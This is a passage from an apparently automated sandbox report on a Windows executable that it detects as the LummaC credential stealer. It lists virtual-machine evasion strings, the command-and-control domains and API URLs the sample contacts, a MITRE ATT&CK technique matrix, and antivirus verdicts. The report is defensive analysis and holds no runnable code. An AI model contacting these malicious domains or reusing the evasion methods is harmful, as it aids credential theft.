                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exe TID: 5296Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: Amcache.hve.10.drBinary or memory string: VMware
                  Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: SkaKk8Z1J0.exe, 00000000.00000003.1356655281.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                  Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043A9B0 LdrInitializeThunk,0_2_0043A9B0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00540083 push dword ptr fs:[00000030h]0_2_00540083
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0074092B mov eax, dword ptr fs:[00000030h]0_2_0074092B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00740D90 mov eax, dword ptr fs:[00000030h]0_2_00740D90

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  LummaC encrypted strings found
                  Source: SkaKk8Z1J0.exeString found in binary or memory: debonairnukk.xyz
                  Source: SkaKk8Z1J0.exeString found in binary or memory: diffuculttan.xyz
                  Source: SkaKk8Z1J0.exeString found in binary or memory: effecterectz.xyz
                  Source: SkaKk8Z1J0.exeString found in binary or memory: deafeninggeh.biz
                  Source: SkaKk8Z1J0.exeString found in binary or memory: immureprech.biz
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 0.2.SkaKk8Z1J0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SkaKk8Z1J0.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.SkaKk8Z1J0.exe.790000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.SkaKk8Z1J0.exe.790000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1261325355.0000000000790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 0.2.SkaKk8Z1J0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SkaKk8Z1J0.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.SkaKk8Z1J0.exe.790000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.SkaKk8Z1J0.exe.790000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1261325355.0000000000790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  PowerShell                  		1
                  DLL Side-Loading                  		1
                  Process Injection                  		1
                  Virtualization/Sandbox Evasion                  		OS Credential Dumping11
                  Security Software Discovery                  		Remote Services1
                  Screen Capture                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Process Injection                  		LSASS Memory1
                  Virtualization/Sandbox Evasion                  		Remote Desktop Protocol1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Deobfuscate/Decode Files or Information                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin Shares2
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                  Obfuscated Files or Information                  		NTDS2
                  System Information Discovery                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
                  Software Packing                  		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SkaKk8Z1J0.exe39%ReversingLabsWin32.Trojan.Generic
                  SkaKk8Z1J0.exe100%AviraHEUR/AGEN.1306956
                  SkaKk8Z1J0.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://effecterectz.xyz/tX100%Avira URL Cloudmalware
                  https://effecterectz.xyz:443/api0u100%Avira URL Cloudmalware
                  http://store.steampoweret0%Avira URL Cloudsafe
                  https://awake-weaves.cyou/apiUZ100%Avira URL Cloudmalware
                  https://effecterectz.xyz/z100%Avira URL Cloudmalware
                  https://effecterectz.xyz/4100%Avira URL Cloudmalware
                  https://immureprech.biz/pi100%Avira URL Cloudmalware
                  https://community.fas0%Avira URL Cloudsafe
                  https://effecterectz.xyz/api2100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.214.172
                  		truefalse
                    		high
                    steamcommunity.com
                    		104.121.10.34
                    		truefalse
                      		high
                      immureprech.biz
                      		45.77.249.79
                      		truefalse
                        		high
                        deafeninggeh.biz
                        		104.131.68.180
                        		truefalse
                          		high
                          sordid-snaked.cyou
                          		unknown
                          		unknownfalse
                            		high
                            diffuculttan.xyz
                            		unknown
                            		unknownfalse
                              		high
                              effecterectz.xyz
                              		unknown
                              		unknownfalse
                                		high
                                awake-weaves.cyou
                                		unknown
                                		unknownfalse
                                  		high
                                  wrathful-jammy.cyou
                                  		unknown
                                  		unknownfalse
                                    		high
                                    debonairnukk.xyz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      sordid-snaked.cyoufalse
                                        		high
                                        deafeninggeh.bizfalse
                                          		high
                                          effecterectz.xyzfalse
                                            		high
                                            wrathful-jammy.cyoufalse
                                              		high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                		high
                                                awake-weaves.cyoufalse
                                                  		high
                                                  immureprech.bizfalse
                                                    		high
                                                    https://immureprech.biz/apifalse
                                                      		high
                                                      debonairnukk.xyzfalse
                                                        		high
                                                        diffuculttan.xyzfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://player.vimeo.comSkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://steamcommunity.com/?subsection=broadcastsSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://immureprech.biz/piSkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000817000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://store.steampowered.com/subscriber_agreement/SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.gstatic.cn/recaptcha/SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://wrathful-jammy.cyou/apiSkaKk8Z1J0.exe, 00000000.00000003.1356087080.000000000084E000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725301911.0000000000852000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.valvesoftware.com/legal.htmSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.comSkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.google.comSkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://store.steampoweretSkaKk8Z1J0.exe, 00000000.00000002.1725378760.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355984707.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356675381.00000000008A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englSkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7TSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCSkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://s.ytimg.com;SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000002.1725392835.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356655281.000000000080A000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&SkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/SkaKk8Z1J0.exe, 00000000.00000002.1725251451.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://effecterectz.xyz/tXSkaKk8Z1J0.exe, 00000000.00000003.1311985748.0000000000856000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://steam.tv/SkaKk8Z1J0.exe, 00000000.00000003.1356441139.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=eSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEBSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1356087080.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enSkaKk8Z1J0.exe, 00000000.00000003.1356601284.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, SkaKk8Z1J0.exe, 00000000.00000003.1355953768.00000000008AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
